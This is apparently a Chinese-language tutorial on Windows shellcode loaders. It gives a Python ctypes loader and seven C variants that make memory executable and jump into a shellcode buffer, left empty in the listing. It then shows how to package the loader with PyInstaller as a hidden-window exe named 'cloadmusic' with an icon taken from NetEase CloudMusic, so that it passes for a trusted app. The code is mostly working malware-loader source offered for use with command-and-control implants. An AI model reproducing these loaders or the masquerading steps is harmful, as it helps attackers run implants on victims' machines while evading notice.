shellcode basic loader
shellcode basic loader
Python
直接用python运行即可上线
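import ctypes

# Win32 constants (winnt.h / winbase.h), named so the calls read like the C listings below.
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READWRITE = 0x40
INFINITE = 0xFFFFFFFF

kernel32 = ctypes.windll.kernel32

# Declare argument and return types explicitly. The original set only
# VirtualAlloc.restype (to c_uint64, wrong on 32-bit Python) and passed c_int(0)
# for pointer-sized parameters; ctypes then marshals 32-bit ints for 64-bit
# pointers/handles and truncates returned HANDLEs to int.
VirtualAlloc = kernel32.VirtualAlloc
VirtualAlloc.argtypes = (ctypes.c_void_p, ctypes.c_size_t, ctypes.c_uint32, ctypes.c_uint32)
VirtualAlloc.restype = ctypes.c_void_p

RtlMoveMemory = kernel32.RtlMoveMemory
RtlMoveMemory.argtypes = (ctypes.c_void_p, ctypes.c_void_p, ctypes.c_size_t)
RtlMoveMemory.restype = None

CreateThread = kernel32.CreateThread
CreateThread.argtypes = (ctypes.c_void_p, ctypes.c_size_t, ctypes.c_void_p,
                         ctypes.c_void_p, ctypes.c_uint32, ctypes.c_void_p)
CreateThread.restype = ctypes.c_void_p

WaitForSingleObject = kernel32.WaitForSingleObject
WaitForSingleObject.argtypes = (ctypes.c_void_p, ctypes.c_uint32)
WaitForSingleObject.restype = ctypes.c_uint32

# Raw payload bytes. The listing leaves this empty; an empty buffer would make
# VirtualAlloc(size=0) fail and the original then copied into a NULL pointer.
buf = b""
sc = bytearray(buf)
if not sc:
    raise SystemExit("buf is empty: paste the shellcode bytes into buf first")

# Reserve + commit one RWX region for the payload. This is the plainest possible
# loader: nothing here hides the RWX allocation or the thread creation.
k = VirtualAlloc(None, len(sc), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE)
if not k:
    raise ctypes.WinError()

# Copy the bytes into the new region (RtlMoveMemory behaves like memmove).
src = (ctypes.c_char * len(sc)).from_buffer(sc)
RtlMoveMemory(k, src, len(sc))

# Start a thread at the region's first byte and block until it finishes.
h = CreateThread(None, 0, k, None, 0, None)
if not h:
    raise ctypes.WinError()
WaitForSingleObject(h, INFINITE)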
那么怎么把py脚本打包成exe呢?先安装一个pyinstaller
pip3 install pyinstaller==5.8.0
pyinstaller -F -w .\main.py -i "C:\Program Files (x86)\NetEase\CloudMusic\cloudmusic.exe" -n cloadmusic --clean --key fuckqwer
-F 打包成单个exe文件
-w 不显示黑窗口
-i 指定图标,可以偷别的exe程序的
-n 指定打包好的文件名
--clean 清理上一次打包的文件,清除旧的中间构建文件,保证干净
--key xxxxx 用 AES 加密打包进去的 .pyc 字节码(需要 pip install tinyaes)。注意这不是真正的代码混淆:密钥本身就嵌在生成的 exe 里,解包后可以直接恢复出源码;该选项在 PyInstaller 6.0 起已被移除,这也是上面固定安装 5.8.0 的原因之一
在 Win7 环境下运行时报错(原因未查明;一个常见原因是 Python 3.9 及以上版本官方已不再支持 Win7,可以换 3.8 打包来排除这一因素),在 Win11 下直接运行脚本和打包后运行两种方式都可以上线
C申请内存
#include <windows.h>
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")
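/* Payload bytes. Left empty in the listing, so sizeof(sc) == 1 (just the NUL). */
unsigned char sc[] = "";

/*
 * Allocate one fresh RWX region, copy the payload into it, and jump to it on
 * the current thread. Returns 1 if the allocation fails; otherwise it only
 * returns if the payload itself returns.
 */
int main(void) {
    /* Named protection flag instead of the raw 0x40 (== PAGE_EXECUTE_READWRITE). */
    LPVOID addr = VirtualAlloc(NULL, sizeof(sc), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (addr == NULL) {
        return 1;
    }
    memcpy(addr, sc, sizeof(sc));
    /* Control transfer: treat the RWX buffer as a function and call it. */
    ((void (*)(void))addr)();
    return 0;
}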
C用循环逐字节写入
#include <windows.h>
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")
/* Payload bytes; empty in the listing. */
unsigned char sc[] = "";

/*
 * Same as the VirtualAlloc loader above, but the copy is an explicit byte walk
 * instead of memcpy. Returns -1 if the RWX allocation fails; otherwise only
 * returns if the payload does.
 */
int main() {
    const SIZE_T total = sizeof(sc);
    BYTE *dst = (BYTE *)VirtualAlloc(NULL, total, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (dst == NULL) {
        return -1;
    }
    /* Pointer walk over [sc, sc + total); same bytes land in the same order. */
    const unsigned char *src = sc;
    const unsigned char *end = sc + total;
    BYTE *out = dst;
    while (src != end) {
        *out++ = *src++;
    }
    ((void (*)(void))dst)();
    return 0;
}
C修改内存属性
#include <windows.h>
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")
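/* Payload bytes, living in .data (read/write, not executable by default). */
unsigned char sc[] = "";

/*
 * Execute the payload in place: change the protection of the page(s) holding
 * sc to RWX with VirtualProtect, then call into the array. VirtualProtect works
 * at page granularity, so the whole page containing sc becomes executable.
 * Unlike the original, a failed VirtualProtect is reported instead of jumping
 * into a non-executable page, which faults under DEP.
 */
int main(void) {
    DWORD oldProtect = 0;
    if (!VirtualProtect(sc, sizeof(sc), PAGE_EXECUTE_READWRITE, &oldProtect)) {
        return 1;
    }
    void (*func)(void) = (void (*)(void))(void *)sc;
    func();
    return 0;
}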
C修改data段属性
#include <Windows.h>
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")
#pragma comment(linker, "/section:.data,RWE")
/* Payload bytes. With the /section:.data,RWE linker switch above, .data is already executable. */
unsigned char sc[] = "";

/* Call straight into sc: no allocation or VirtualProtect is needed because .data is RWE. */
void main() {
    ((void (*)(void))(void *)sc)();
}
C自定义数据段
#include <Windows.h>
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")
/* Put sc in its own section "vdata" so the linker switch below marks only that section RWE. */
#pragma data_seg("vdata")
unsigned char sc[] = "";
#pragma data_seg()
#pragma comment(linker,"/SECTION:vdata,RWE")

/* Jump straight into the executable section holding sc. */
void main() {
    ((void (*)(void))(void *)sc)();
}
C通过堆加载
#include <Windows.h>
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")
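/* Payload bytes; empty in the listing. */
unsigned char sc[] = "";

/*
 * Run the payload from a private executable heap. HEAP_CREATE_ENABLE_EXECUTE
 * makes blocks from this heap executable, so no VirtualProtect is needed.
 * Both HeapCreate and HeapAlloc can return NULL; the original memcpy'd into
 * the result unchecked, which is a NULL dereference on failure.
 */
int main(void) {
    HANDLE heap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, sizeof(sc), 0);
    if (heap == NULL) {
        return 1;
    }
    unsigned char *buffer = (unsigned char *)HeapAlloc(heap, HEAP_ZERO_MEMORY, sizeof(sc));
    if (buffer == NULL) {
        HeapDestroy(heap);
        return 1;
    }
    memcpy(buffer, sc, sizeof(sc));
    ((void (*)(void))buffer)();
    return 0;
}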
C创建线程运行
#include <Windows.h>
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")
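/* Payload bytes; empty in the listing. */
unsigned char sc[] = "";

/*
 * Copy the payload into a fresh RWX region and run it on a new thread, then
 * wait for that thread to exit. Fixes versus the original: dwStackSize is a
 * SIZE_T, so pass 0 rather than the NULL pointer macro; the wait timeout is
 * the DWORD INFINITE rather than -1; and a failed CreateThread is reported
 * instead of being handed to WaitForSingleObject/CloseHandle as NULL.
 */
int main(void) {
    LPVOID addr = VirtualAlloc(NULL, sizeof(sc), MEM_COMMIT | MEM_RESERVE,
                               PAGE_EXECUTE_READWRITE);
    if (addr == NULL) {
        return 1;
    }
    memcpy(addr, sc, sizeof(sc));
    HANDLE hThread = CreateThread(NULL,
                                  0,
                                  (LPTHREAD_START_ROUTINE)addr,
                                  NULL,
                                  0,
                                  NULL);
    if (hThread == NULL) {
        VirtualFree(addr, 0, MEM_RELEASE);
        return 1;
    }
    WaitForSingleObject(hThread, INFINITE);
    CloseHandle(hThread);
    return 0;
}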